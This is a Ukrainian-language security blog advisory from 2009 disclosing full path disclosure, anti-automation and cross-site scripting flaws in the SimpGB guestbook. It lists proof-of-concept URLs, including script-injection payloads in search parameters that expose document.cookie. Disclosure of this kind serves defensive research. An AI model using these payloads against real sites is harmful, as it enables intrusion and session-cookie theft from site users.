Websecurity - Веб безпека

31.08.2009

У січні, 09.01.2009, я знайшов Full path disclosure, Insufficient Anti-automation та Cross-Site Scripting уразливості в SimpGB. Це гостьова книга. Дані уразливості я виявив на сайті zhelem.com. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

14.11.2009

Full path disclosure:

http://site/admin/index.php?lang=1

http://site/admin/pwlost.php?lang=1

http://site/admin/usered.php?lang=1&mode=comment&input_entrynr=44&entrylang=en

Insufficient Anti-automation:

http://site/admin/usered.php?lang=en&mode=comment&input_entrynr=44&entrylang=en

Логін і пароль фіксовані та задані на сторінці.

XSS:

http://site/search.php?searchvalues=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?category=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі SimpGB V1.37.3 та пепередні версії (і потенційно наступні версії).

This entry was posted on 20:02 14.11.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.